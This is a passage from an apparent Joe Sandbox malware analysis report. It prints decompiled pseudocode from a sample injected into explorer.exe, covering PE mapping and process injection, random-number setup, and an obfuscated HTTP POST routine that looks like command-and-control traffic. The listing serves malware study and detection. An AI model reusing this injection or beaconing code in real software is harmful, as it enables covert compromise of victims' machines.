                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 007ADF64
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007AE05E
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000000), ref: 007AE123
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 007AE14E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateCurrentDirectoryErrorHeapLastProcessVersionWindows
                                                                                                                                                                        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                        • API String ID: 3743117707-2706916422
                                                                                                                                                                        • Opcode ID: cf49ca8f8bc9c870085bbcaee02c056118686345fdf72ea248ca61e06a58e86e
                                                                                                                                                                        • Instruction ID: 0597e30464e1835fe014ab473e1a3b4b0bc2ef85eb7ba9c0ac881494b7270437
                                                                                                                                                                        • Opcode Fuzzy Hash: cf49ca8f8bc9c870085bbcaee02c056118686345fdf72ea248ca61e06a58e86e
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F91CE71700605EFD704EB74DC4AFEAB7A8BF49700F008239F61997291DB78AA508BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AD447 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 223registrystringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                        			E007AD447(intOrPtr __ecx, intOrPtr __edx) {
				struct HINSTANCE__* _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				struct HINSTANCE__* _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				struct HINSTANCE__* _v48;
				char _v52;
				struct HINSTANCE__* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t90;
				intOrPtr _t95;
				char _t97;
				short _t98;
				intOrPtr _t105;
				void* _t107;
				intOrPtr _t110;
				intOrPtr _t113;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				struct HINSTANCE__* _t138;
				intOrPtr _t145;
				void* _t147;
				char _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				intOrPtr _t158;
				intOrPtr _t160;
				intOrPtr _t162;
				char _t163;
				void* _t165;

				_t81 =  *0x7bf81c; // 0x7d0000
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E007AF0DE(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x7bf918; // 0x0
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x7bf818; // 0xeaf6c8
						_t160 =  *0x7bf918; // 0x0
						 *((intOrPtr*)(_t160 + 0x10))( *((intOrPtr*)(_t87 + 0x12c))(_v16));
					}
					if(_v20 != 0) {
						_t85 =  *0x7bf918; // 0x0
						 *((intOrPtr*)(_t85 + 0x20))(_v20);
					}
					return _v8;
				}
				_push(_t138);
				_push(0x8000000);
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				_push(0x40);
				_push( &_v52);
				_push(_t138);
				_push(0xe);
				_push( &_v20);
				_t95 =  *0x7bf918; // 0x0
				if( *((intOrPtr*)(_t95 + 0xc))() < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x7bce44; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t162 =  *0x7bf918; // 0x0
				_t105 =  *0x7bf818; // 0xeaf6c8
				_t107 =  *((intOrPtr*)(_t162 + 0x14))(_v20,  *((intOrPtr*)(_t105 + 0x12c))( &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40));
				_t158 = _v12;
				if(_t107 < 0) {
					goto L15;
				} else {
					_push(0x40);
					_push(_t138);
					_push(2);
					_push( &_v24);
					_push(_t138);
					_push(_t138);
					_push(_t138);
					_push( &_v8);
					_t110 =  *0x7bf918; // 0x0
					_push(_t158);
					_push(_v20);
					if( *((intOrPtr*)(_t110 + 0x14))() < 0) {
						goto L15;
					}
					_t154 = E007A8C43( *0x7bf81c, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t113 =  *0x7bf818; // 0xeaf6c8
					_t163 =  *((intOrPtr*)(_t113 + 0x54))(_t158, _t138, 0x1ac4, 0x1000, 4);
					_t145 =  *0x7bf818; // 0xeaf6c8
					 *((intOrPtr*)(_t145 + 0x20))(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E007A8BF4( &_v36, 0x1ac4);
					_t119 =  *0x7bf81c; // 0x7d0000
					_t155 =  *0x7bf830; // 0x7a0000
					_v36 = _t119;
					 *0x7bf830 = _v8;
					 *0x7bf81c = _t163;
					E007A8CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E007AD3C6(_v16, _v8, _v44);
					_t124 = E007AA43D("quatr");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 =  &(_t138->i);
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x7bf830 = _t155;
						 *0x7bf81c = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}













































                                                                                                                                                                        0x007ad44d
                                                                                                                                                                        0x007ad453
                                                                                                                                                                        0x007ad455
                                                                                                                                                                        0x007ad459
                                                                                                                                                                        0x007ad45b
                                                                                                                                                                        0x007ad45e
                                                                                                                                                                        0x007ad461
                                                                                                                                                                        0x007ad464
                                                                                                                                                                        0x007ad467
                                                                                                                                                                        0x007ad46a
                                                                                                                                                                        0x007ad475
                                                                                                                                                                        0x007ad478
                                                                                                                                                                        0x007ad47f
                                                                                                                                                                        0x007ad47f
                                                                                                                                                                        0x007ad484
                                                                                                                                                                        0x007ad487
                                                                                                                                                                        0x007ad489
                                                                                                                                                                        0x007ad48c
                                                                                                                                                                        0x007ad495
                                                                                                                                                                        0x007ad68e
                                                                                                                                                                        0x007ad68e
                                                                                                                                                                        0x007ad691
                                                                                                                                                                        0x007ad694
                                                                                                                                                                        0x007ad699
                                                                                                                                                                        0x007ad69f
                                                                                                                                                                        0x007ad6a2
                                                                                                                                                                        0x007ad6a2
                                                                                                                                                                        0x007ad6a5
                                                                                                                                                                        0x007ad6a9
                                                                                                                                                                        0x007ad6ab
                                                                                                                                                                        0x007ad6b3
                                                                                                                                                                        0x007ad6c0
                                                                                                                                                                        0x007ad6c0
                                                                                                                                                                        0x007ad6ca
                                                                                                                                                                        0x007ad6cc
                                                                                                                                                                        0x007ad6d4
                                                                                                                                                                        0x007ad6d4
                                                                                                                                                                        0x007ad6db
                                                                                                                                                                        0x007ad6db
                                                                                                                                                                        0x007ad49e
                                                                                                                                                                        0x007ad49f
                                                                                                                                                                        0x007ad4a4
                                                                                                                                                                        0x007ad4aa
                                                                                                                                                                        0x007ad4ac
                                                                                                                                                                        0x007ad4ad
                                                                                                                                                                        0x007ad4ae
                                                                                                                                                                        0x007ad4b3
                                                                                                                                                                        0x007ad4b4
                                                                                                                                                                        0x007ad4be
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad4c4
                                                                                                                                                                        0x007ad4cc
                                                                                                                                                                        0x007ad4d4
                                                                                                                                                                        0x007ad4da
                                                                                                                                                                        0x007ad4e1
                                                                                                                                                                        0x007ad4e9
                                                                                                                                                                        0x007ad4ea
                                                                                                                                                                        0x007ad4f1
                                                                                                                                                                        0x007ad4f4
                                                                                                                                                                        0x007ad4f5
                                                                                                                                                                        0x007ad4fc
                                                                                                                                                                        0x007ad4ff
                                                                                                                                                                        0x007ad506
                                                                                                                                                                        0x007ad507
                                                                                                                                                                        0x007ad50a
                                                                                                                                                                        0x007ad516
                                                                                                                                                                        0x007ad538
                                                                                                                                                                        0x007ad540
                                                                                                                                                                        0x007ad543
                                                                                                                                                                        0x007ad54e
                                                                                                                                                                        0x007ad54e
                                                                                                                                                                        0x007ad540
                                                                                                                                                                        0x007ad554
                                                                                                                                                                        0x007ad56a
                                                                                                                                                                        0x007ad579
                                                                                                                                                                        0x007ad57c
                                                                                                                                                                        0x007ad581
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad587
                                                                                                                                                                        0x007ad587
                                                                                                                                                                        0x007ad589
                                                                                                                                                                        0x007ad58a
                                                                                                                                                                        0x007ad58f
                                                                                                                                                                        0x007ad590
                                                                                                                                                                        0x007ad591
                                                                                                                                                                        0x007ad592
                                                                                                                                                                        0x007ad596
                                                                                                                                                                        0x007ad597
                                                                                                                                                                        0x007ad59c
                                                                                                                                                                        0x007ad59d
                                                                                                                                                                        0x007ad5a5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad5bb
                                                                                                                                                                        0x007ad5bd
                                                                                                                                                                        0x007ad5c4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad5d9
                                                                                                                                                                        0x007ad5df
                                                                                                                                                                        0x007ad5ec
                                                                                                                                                                        0x007ad5fa
                                                                                                                                                                        0x007ad600
                                                                                                                                                                        0x007ad60c
                                                                                                                                                                        0x007ad611
                                                                                                                                                                        0x007ad616
                                                                                                                                                                        0x007ad61c
                                                                                                                                                                        0x007ad622
                                                                                                                                                                        0x007ad62a
                                                                                                                                                                        0x007ad63a
                                                                                                                                                                        0x007ad646
                                                                                                                                                                        0x007ad650
                                                                                                                                                                        0x007ad658
                                                                                                                                                                        0x007ad65d
                                                                                                                                                                        0x007ad660
                                                                                                                                                                        0x007ad668
                                                                                                                                                                        0x007ad668
                                                                                                                                                                        0x007ad668
                                                                                                                                                                        0x007ad66b
                                                                                                                                                                        0x007ad66f
                                                                                                                                                                        0x007ad670
                                                                                                                                                                        0x007ad674
                                                                                                                                                                        0x007ad678
                                                                                                                                                                        0x007ad681
                                                                                                                                                                        0x007ad687
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad687
                                                                                                                                                                        0x007ad662
                                                                                                                                                                        0x007ad666
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad666

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegisterClassExA.USER32(?), ref: 007AD50D
                                                                                                                                                                        • CreateWindowExA.USER32 ref: 007AD538
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 007AD543
                                                                                                                                                                        • UnregisterClassA.USER32 ref: 007AD54E
                                                                                                                                                                          • Part of subcall function 007A8BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 007A8C3A
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,007A61C5), ref: 007AD678
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassWindow$CreateDestroyFreeHeapRegisterUnregisterlstrlen
                                                                                                                                                                        • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                        • API String ID: 1751977465-2640591812
                                                                                                                                                                        • Opcode ID: e75bcd2ff5d2c13c19282b87ab19074279607aafae611e285e687b13a3827ed3
                                                                                                                                                                        • Instruction ID: 5097348c3a1fa0fdb7da19fd873de7958515ae5744d3aa7ee1b688326f62f515
                                                                                                                                                                        • Opcode Fuzzy Hash: e75bcd2ff5d2c13c19282b87ab19074279607aafae611e285e687b13a3827ed3
                                                                                                                                                                        • Instruction Fuzzy Hash: CE81E6B1900219AFDB10DF99DC84EEEBBB8FB49744F148269F605E7250D778AE01CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007B28F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E007B28F0(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E007B284B( &_v16);
				return 0;
			}











                                                                                                                                                                        0x007b28f6
                                                                                                                                                                        0x007b2908
                                                                                                                                                                        0x007b290c
                                                                                                                                                                        0x007b2980
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b2982
                                                                                                                                                                        0x007b291c
                                                                                                                                                                        0x007b2920
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b2928
                                                                                                                                                                        0x007b292a
                                                                                                                                                                        0x007b292f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b2939
                                                                                                                                                                        0x007b293d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b293f
                                                                                                                                                                        0x007b2944
                                                                                                                                                                        0x007b2946
                                                                                                                                                                        0x007b2948
                                                                                                                                                                        0x007b294d
                                                                                                                                                                        0x007b2952
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b295d
                                                                                                                                                                        0x007b2967
                                                                                                                                                                        0x007b296b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b297a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,007A7B6A), ref: 007B2902
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 007B291A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 007B2928
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 007B2937
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                        • API String ID: 667068680-129414566
                                                                                                                                                                        • Opcode ID: 888bf1e12e7f36d64d08b5c1aac06aad98ea02a0c2b95af239d3c9724e9cab59
                                                                                                                                                                        • Instruction ID: f1b1c61d74f75524f32a80f9eadb0e0eddf152da23a1fd5e0017684dd0756dd9
                                                                                                                                                                        • Opcode Fuzzy Hash: 888bf1e12e7f36d64d08b5c1aac06aad98ea02a0c2b95af239d3c9724e9cab59
                                                                                                                                                                        • Instruction Fuzzy Hash: 5C11E9B2E4130677DB11A6A48C49FDEF7AC9F44780F150120F700F6191DE78EE028698
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AF7A6 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E007AF7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_v56 = E007A9DD8(0xd62);
				_v52 = E007A9DD8(0x8e9);
				_v48 = E007A9DD8(0xa93);
				_v44 = E007A9DD8(0x9a9);
				_t94 = E007A9DD8(0xb64);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E007A8D6D( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E007AA43D(_t190));
				_t102 =  *0x7bf838; // 0xeb0710
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x7bf838; // 0xeb0710
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x7bf920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E007AF73E(_t189);
							_t110 =  *0x7bf838; // 0xeb0710
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E007AA065(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x7bf838; // 0xeb0710
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E007AA065(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E007AF6EC(_t116);
									}
									_t117 = E007A9DD8(0x901);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x7bf838; // 0xeb0710
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E007AA43D(_t193), _a4, _a8);
									E007A8B9C( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E007AA065(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E007A8D6D( &_v20, 0, _t122);
										_t127 =  *0x7bf838; // 0xeb0710
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E007A9F6F( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x7bf838; // 0xeb0710
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x7bf838; // 0xeb0710
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x7bf838; // 0xeb0710
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x7bf838; // 0xeb0710
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x7bf838; // 0xeb0710
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x7bf838; // 0xeb0710
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x7bf838; // 0xeb0710
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x7bf838; // 0xeb0710
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x7bf838; // 0xeb0710
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}





























































                                                                                                                                                                        0x007af7b4
                                                                                                                                                                        0x007af7c0
                                                                                                                                                                        0x007af7c7
                                                                                                                                                                        0x007af7d4
                                                                                                                                                                        0x007af7d7
                                                                                                                                                                        0x007af7e8
                                                                                                                                                                        0x007af7ff
                                                                                                                                                                        0x007af80c
                                                                                                                                                                        0x007af819
                                                                                                                                                                        0x007af826
                                                                                                                                                                        0x007af829
                                                                                                                                                                        0x007af82e
                                                                                                                                                                        0x007af833
                                                                                                                                                                        0x007af835
                                                                                                                                                                        0x007af83d
                                                                                                                                                                        0x007af845
                                                                                                                                                                        0x007af84c
                                                                                                                                                                        0x007af858
                                                                                                                                                                        0x007af85b
                                                                                                                                                                        0x007af869
                                                                                                                                                                        0x007af86c
                                                                                                                                                                        0x007af872
                                                                                                                                                                        0x007af873
                                                                                                                                                                        0x007af875
                                                                                                                                                                        0x007af87e
                                                                                                                                                                        0x007af87f
                                                                                                                                                                        0x007af884
                                                                                                                                                                        0x007af88a
                                                                                                                                                                        0x007af894
                                                                                                                                                                        0x007af894
                                                                                                                                                                        0x007af896
                                                                                                                                                                        0x007af89b
                                                                                                                                                                        0x007af8a5
                                                                                                                                                                        0x007af8b0
                                                                                                                                                                        0x007af8b9
                                                                                                                                                                        0x007af8bb
                                                                                                                                                                        0x007af8bd
                                                                                                                                                                        0x007af8cc
                                                                                                                                                                        0x007af8e3
                                                                                                                                                                        0x007af8e9
                                                                                                                                                                        0x007af8ec
                                                                                                                                                                        0x007af8f0
                                                                                                                                                                        0x007af8f2
                                                                                                                                                                        0x007af8f7
                                                                                                                                                                        0x007af8f7
                                                                                                                                                                        0x007af8fc
                                                                                                                                                                        0x007af8fe
                                                                                                                                                                        0x007af914
                                                                                                                                                                        0x007af918
                                                                                                                                                                        0x007af91d
                                                                                                                                                                        0x007af91f
                                                                                                                                                                        0x007af91f
                                                                                                                                                                        0x007af933
                                                                                                                                                                        0x007af93e
                                                                                                                                                                        0x007af941
                                                                                                                                                                        0x007af944
                                                                                                                                                                        0x007af947
                                                                                                                                                                        0x007af94c
                                                                                                                                                                        0x007af951
                                                                                                                                                                        0x007af951
                                                                                                                                                                        0x007af954
                                                                                                                                                                        0x007af956
                                                                                                                                                                        0x007af97c
                                                                                                                                                                        0x007af980
                                                                                                                                                                        0x007af984
                                                                                                                                                                        0x007af984
                                                                                                                                                                        0x007af98e
                                                                                                                                                                        0x007af996
                                                                                                                                                                        0x007af99b
                                                                                                                                                                        0x007af9a6
                                                                                                                                                                        0x007af9ac
                                                                                                                                                                        0x007af9b6
                                                                                                                                                                        0x007af9b9
                                                                                                                                                                        0x007af9be
                                                                                                                                                                        0x007af9c2
                                                                                                                                                                        0x007af9c7
                                                                                                                                                                        0x007af9c7
                                                                                                                                                                        0x007af9cc
                                                                                                                                                                        0x007af9d0
                                                                                                                                                                        0x007afa1b
                                                                                                                                                                        0x007afa1d
                                                                                                                                                                        0x007afa20
                                                                                                                                                                        0x007afa28
                                                                                                                                                                        0x007afa2c
                                                                                                                                                                        0x007afa2f
                                                                                                                                                                        0x007afa41
                                                                                                                                                                        0x007afa4c
                                                                                                                                                                        0x007afa4e
                                                                                                                                                                        0x007afa62
                                                                                                                                                                        0x007afa67
                                                                                                                                                                        0x007afa6c
                                                                                                                                                                        0x007afaa1
                                                                                                                                                                        0x007afaa6
                                                                                                                                                                        0x007afaab
                                                                                                                                                                        0x007afaad
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007afaad
                                                                                                                                                                        0x007afa70
                                                                                                                                                                        0x007afa73
                                                                                                                                                                        0x007afa73
                                                                                                                                                                        0x007afa79
                                                                                                                                                                        0x007afa7c
                                                                                                                                                                        0x007afa7f
                                                                                                                                                                        0x007afa7f
                                                                                                                                                                        0x007afa81
                                                                                                                                                                        0x007afa83
                                                                                                                                                                        0x007afa89
                                                                                                                                                                        0x007afa89
                                                                                                                                                                        0x007afa8c
                                                                                                                                                                        0x007afa8e
                                                                                                                                                                        0x007afa90
                                                                                                                                                                        0x007afa97
                                                                                                                                                                        0x007afa97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007afa9a
                                                                                                                                                                        0x007afa50
                                                                                                                                                                        0x007afa56
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007af9d2
                                                                                                                                                                        0x007af9d2
                                                                                                                                                                        0x007af9d8
                                                                                                                                                                        0x007af9de
                                                                                                                                                                        0x007af9e1
                                                                                                                                                                        0x007af9e6
                                                                                                                                                                        0x007af9eb
                                                                                                                                                                        0x007af9ee
                                                                                                                                                                        0x007af9f3
                                                                                                                                                                        0x007af9f3
                                                                                                                                                                        0x007af9f6
                                                                                                                                                                        0x007af9f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007af9f9
                                                                                                                                                                        0x007af958
                                                                                                                                                                        0x007af958
                                                                                                                                                                        0x007af95e
                                                                                                                                                                        0x007af964
                                                                                                                                                                        0x007af967
                                                                                                                                                                        0x007af96c
                                                                                                                                                                        0x007af96f
                                                                                                                                                                        0x007af972
                                                                                                                                                                        0x007af974
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007af974
                                                                                                                                                                        0x007af900
                                                                                                                                                                        0x007af900
                                                                                                                                                                        0x007af906
                                                                                                                                                                        0x007af90c
